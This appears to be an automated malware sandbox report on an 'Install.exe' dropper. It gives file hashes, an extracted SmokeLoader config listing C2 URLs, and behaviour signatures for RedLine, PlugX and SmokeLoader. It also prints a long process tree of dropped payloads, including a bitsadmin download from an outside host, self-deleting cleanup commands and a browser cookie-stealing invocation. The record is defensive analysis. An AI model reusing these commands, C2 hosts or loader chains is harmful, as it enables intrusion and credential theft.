Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1803s
  • max time network
    1805s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    04-05-2021 05:23

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 50 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 25 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 33 IoCs
  • Modifies registry class 34 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        PID:856
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {FD4EFBBA-CA5A-46ED-8383-99B145D1AFC8} S-1-5-18:NT AUTHORITY\System:Service:
          3⤵
            PID:7140
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
              4⤵
              • Executes dropped EXE
              PID:1588
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
              4⤵
              • Executes dropped EXE
              PID:7124
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
              4⤵
              • Executes dropped EXE
              PID:7008
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
              4⤵
              • Executes dropped EXE
              PID:2096
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
              4⤵
              • Executes dropped EXE
              PID:2856
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
              4⤵
              • Executes dropped EXE
              PID:5256
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
              4⤵
              • Executes dropped EXE
              PID:7552
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {D36ACB86-1EB2-473B-BEF8-277261B51110} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
            3⤵
              PID:7596
              • C:\Users\Admin\AppData\Roaming\btfdhws
                C:\Users\Admin\AppData\Roaming\btfdhws
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:7632
                • C:\Users\Admin\AppData\Roaming\btfdhws
                  C:\Users\Admin\AppData\Roaming\btfdhws
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:7648
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {581EE187-273D-4F0A-9F04-B52A4A065CAE} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
              3⤵
                PID:8068
                • C:\Users\Admin\AppData\Roaming\btfdhws
                  C:\Users\Admin\AppData\Roaming\btfdhws
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:8104
                  • C:\Users\Admin\AppData\Roaming\btfdhws
                    C:\Users\Admin\AppData\Roaming\btfdhws
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:8116
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {449DD032-4C2B-4A37-96BF-BCD38531DAC4} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
                3⤵
                  PID:7320
                  • C:\Users\Admin\AppData\Roaming\btfdhws
                    C:\Users\Admin\AppData\Roaming\btfdhws
                    4⤵
                    • Executes dropped EXE
                    PID:2036
              • C:\Windows\system32\msiexec.exe
                C:\Windows\system32\msiexec.exe /V
                2⤵
                • Enumerates connected drives
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                PID:2376
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding AD742799BAE9D4DB15A7CE0FD03C274E C
                  3⤵
                  • Loads dropped DLL
                  PID:2496
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 9C813C17E61CA168C01BC7A7C11802C0
                  3⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  PID:2852
                  • C:\Windows\SysWOW64\taskkill.exe
                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                    4⤵
                    • Kills process with taskkill
                    PID:3200
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding C15EE1D0F8569186E0C4DC63810E4252 M Global\MSI0000
                  3⤵
                  • Loads dropped DLL
                  PID:3876
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:3276
            • C:\Users\Admin\AppData\Local\Temp\Install.exe
              "C:\Users\Admin\AppData\Local\Temp\Install.exe"
              1⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1096
              • C:\Users\Admin\AppData\Local\Temp\is-VBD6S.tmp\Install.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-VBD6S.tmp\Install.tmp" /SL5="$400CE,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2012
                • C:\Users\Admin\AppData\Local\Temp\is-1M3VH.tmp\Ultra.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-1M3VH.tmp\Ultra.exe" /S /UID=burnerch1
                  3⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Program Files directory
                  • Suspicious use of WriteProcessMemory
                  PID:844
                  • C:\Program Files\Java\YDBPRFPDLZ\ultramediaburner.exe
                    "C:\Program Files\Java\YDBPRFPDLZ\ultramediaburner.exe" /VERYSILENT
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1052
                    • C:\Users\Admin\AppData\Local\Temp\is-0TGOV.tmp\ultramediaburner.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-0TGOV.tmp\ultramediaburner.tmp" /SL5="$7001A,281924,62464,C:\Program Files\Java\YDBPRFPDLZ\ultramediaburner.exe" /VERYSILENT
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:696
                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                        6⤵
                        • Executes dropped EXE
                        PID:1548
                  • C:\Users\Admin\AppData\Local\Temp\9f-39b75-d39-47daf-fad6a20fca5ec\Gahogaryjae.exe
                    "C:\Users\Admin\AppData\Local\Temp\9f-39b75-d39-47daf-fad6a20fca5ec\Gahogaryjae.exe"
                    4⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1560
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xbzineib.4hk\sskiper.exe /s & exit
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:6616
                      • C:\Users\Admin\AppData\Local\Temp\xbzineib.4hk\sskiper.exe
                        C:\Users\Admin\AppData\Local\Temp\xbzineib.4hk\sskiper.exe /s
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Modifies system certificate store
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        • Suspicious use of WriteProcessMemory
                        PID:6856
                        • C:\Users\Admin\AppData\Local\Temp\1350633989.exe
                          C:\Users\Admin\AppData\Local\Temp\1350633989.exe
                          7⤵
                          • Executes dropped EXE
                          PID:936
                        • C:\Users\Admin\AppData\Local\Temp\1278342404.exe
                          C:\Users\Admin\AppData\Local\Temp\1278342404.exe
                          7⤵
                          • Executes dropped EXE
                          PID:5024
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\xbzineib.4hk\sskiper.exe & exit
                          7⤵
                            PID:5948
                            • C:\Windows\SysWOW64\PING.EXE
                              ping 0
                              8⤵
                              • Runs ping.exe
                              PID:6000
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zfdtpgu4.go4\KiffMainE1.exe & exit
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2940
                        • C:\Users\Admin\AppData\Local\Temp\zfdtpgu4.go4\KiffMainE1.exe
                          C:\Users\Admin\AppData\Local\Temp\zfdtpgu4.go4\KiffMainE1.exe
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2984
                          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                            dw20.exe -x -s 532
                            7⤵
                            • Suspicious behavior: GetForegroundWindowSpam
                            PID:308
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ajiclnv5.5mf\001.exe & exit
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3036
                        • C:\Users\Admin\AppData\Local\Temp\ajiclnv5.5mf\001.exe
                          C:\Users\Admin\AppData\Local\Temp\ajiclnv5.5mf\001.exe
                          6⤵
                          • Executes dropped EXE
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:968
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3phrmqcj.rd2\installer.exe /qn CAMPAIGN="654" & exit
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:320
                        • C:\Users\Admin\AppData\Local\Temp\3phrmqcj.rd2\installer.exe
                          C:\Users\Admin\AppData\Local\Temp\3phrmqcj.rd2\installer.exe /qn CAMPAIGN="654"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Enumerates connected drives
                          • Modifies system certificate store
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of FindShellTrayWindow
                          PID:1520
                          • C:\Windows\SysWOW64\msiexec.exe
                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\3phrmqcj.rd2\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\3phrmqcj.rd2\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619846324 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                            7⤵
                              PID:2676
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q4rb51i1.pgp\gpooe.exe & exit
                          5⤵
                            PID:2292
                            • C:\Users\Admin\AppData\Local\Temp\q4rb51i1.pgp\gpooe.exe
                              C:\Users\Admin\AppData\Local\Temp\q4rb51i1.pgp\gpooe.exe
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Adds Run key to start application
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:2332
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                7⤵
                                • Executes dropped EXE
                                PID:5624
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                7⤵
                                • Executes dropped EXE
                                PID:6040
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                7⤵
                                • Executes dropped EXE
                                PID:7716
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                7⤵
                                • Executes dropped EXE
                                PID:4852
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fvv0dt1u.0no\google-game.exe & exit
                            5⤵
                              PID:2812
                              • C:\Users\Admin\AppData\Local\Temp\fvv0dt1u.0no\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\fvv0dt1u.0no\google-game.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                • Suspicious use of SetWindowsHookEx
                                PID:2872
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                  7⤵
                                  • Loads dropped DLL
                                  • Modifies registry class
                                  PID:3140
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z1hnvips.s4b\askinstall39.exe & exit
                              5⤵
                                PID:3412
                                • C:\Users\Admin\AppData\Local\Temp\z1hnvips.s4b\askinstall39.exe
                                  C:\Users\Admin\AppData\Local\Temp\z1hnvips.s4b\askinstall39.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  PID:3460
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c taskkill /f /im chrome.exe
                                    7⤵
                                      PID:4840
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im chrome.exe
                                        8⤵
                                        • Kills process with taskkill
                                        PID:4872
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tdfqhorb.ldl\setup.exe & exit
                                  5⤵
                                    PID:3668
                                    • C:\Users\Admin\AppData\Local\Temp\tdfqhorb.ldl\setup.exe
                                      C:\Users\Admin\AppData\Local\Temp\tdfqhorb.ldl\setup.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      PID:3752
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\tdfqhorb.ldl\setup.exe"
                                        7⤵
                                          PID:3928
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping 1.1.1.1 -n 1 -w 3000
                                            8⤵
                                            • Runs ping.exe
                                            PID:4036
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zuuujpsn.pq5\SunLabsPlayer.exe /S & exit
                                      5⤵
                                        PID:3980
                                        • C:\Users\Admin\AppData\Local\Temp\zuuujpsn.pq5\SunLabsPlayer.exe
                                          C:\Users\Admin\AppData\Local\Temp\zuuujpsn.pq5\SunLabsPlayer.exe /S
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:4156
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                            7⤵
                                              PID:4724
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5668
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:5928
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:6344
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:6664
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:6964
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                        7⤵
                                                        • Checks for any installed AV software in registry
                                                        PID:968
                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                        7⤵
                                                        • Download via BitsAdmin
                                                        PID:2196
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pm6vEf0V1jawU56m -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        PID:5192
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pziF0KFaFHeETEUi -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5156
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5252
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5548
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5504
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:6200
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:6284
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\lZqTxGDSUx\lZqTxGDSUx.dll" lZqTxGDSUx
                                                                  7⤵
                                                                    PID:6444
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\lZqTxGDSUx\lZqTxGDSUx.dll" lZqTxGDSUx
                                                                      8⤵
                                                                      • Drops file in System32 directory
                                                                      PID:6436
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:316
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                                      7⤵
                                                                      • Drops file in Program Files directory
                                                                      PID:6588
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                                      7⤵
                                                                      • Drops file in Program Files directory
                                                                      PID:6628
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:6848
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi2020.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:6812
                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:7036
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c2kq2k0l.l3u\005.exe & exit
                                                                      5⤵
                                                                        PID:4176
                                                                        • C:\Users\Admin\AppData\Local\Temp\c2kq2k0l.l3u\005.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\c2kq2k0l.l3u\005.exe
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                          PID:4224
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\03h4ruka.rgv\ifhwwyy.exe & exit
                                                                        5⤵
                                                                          PID:4384
                                                                          • C:\Users\Admin\AppData\Local\Temp\03h4ruka.rgv\ifhwwyy.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\03h4ruka.rgv\ifhwwyy.exe
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                            PID:4416
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:6428
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:6784
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:7736
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:2536
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jiehmzxq.5hs\toolspab1.exe & exit
                                                                          5⤵
